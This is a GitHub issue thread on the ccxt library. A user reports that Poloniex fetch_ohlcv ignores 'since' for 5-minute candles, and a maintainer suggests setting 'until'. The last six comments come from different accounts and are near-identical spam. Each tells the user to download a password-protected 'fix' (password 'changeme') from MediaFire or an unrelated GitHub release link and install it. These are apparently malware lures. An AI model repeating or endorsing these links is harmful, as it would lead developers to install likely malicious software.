### ISSUE TITLE
Poloniex fetch_ohclv is not working properly

### ISSUE THREAD

**Issue by lazydroid** [ccxt/ccxt#23236]
### Operating System

Linux (Ubuntu flavour)

### Programming Languages

Python

### CCXT Version

4.2.3

### Description

I'm trying the included example with the date set to "2024-01-01" instead of 2019:
https://github.com/ccxt/ccxt/tree/master/examples/py/poloniex-fetch-ohlcv-with-pagination.py

I expect to get some data from the beginning of the year, what I get is the most recent 500 candles ("5m" timeframe):
```
$ ./fetch_candles_with_pagination.py 
---------------------------------------------------------------
Fetching ohlcvs since 2024-01-01T00:00:00.000Z
Fetched 500 candles
From 2024-07-26T00:35:00.000Z to 2024-07-27T18:10:00.000Z
Fetched 500 candles in total
Fetched 500 candles since 2024-07-26T00:35:00.000Z till 2024-07-27T18:10:00.000Z
```
If i change the timeframe to "1d", the results cover up to the beginning of the year as expected:
```
$ ./fetch_candles_with_pagination.py 
---------------------------------------------------------------
Fetching ohlcvs since 2024-01-01T00:00:00.000Z
Fetched 209 candles
From 2024-01-01T00:00:00.000Z to 2024-07-27T00:00:00.000Z
Fetched 209 candles in total
Fetched 209 candles since 2024-01-01T00:00:00.000Z till 2024-07-27T00:00:00.000Z
```
What I want is to get some "5m" / "15m" historical data for a few last months, but all I get is 500 the most recent candles.

Could you please take a look and tell me what I'm doing wrong?

Thank you very much in advance!

### Code

```
  

```

**Comment by sc0Vu** [comment]
@lazydroid The max count for result is 500 (https://api-docs.poloniex.com/spot/api/public/market-data#candles). You need to set since and until manually.

**Comment by lazydroid** [comment]
@sc0Vu Dear Peter, I'm using the example code from the official distribution. The `since` is set automatically, but it is either ignored by exchange or somehow incorrectly passed to the exchange.

**Comment by sc0Vu** [comment]
@lazydroid Due to the default of endTime is now(), I think you need to set until manually.

eg.
```PY
endTime = since + duration * limit
        candles = exchange.fetch_ohlcv(symbol, timeframe, since, limit, {
            'until': endTime
        })
```

Let us know if you have any other issues.

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
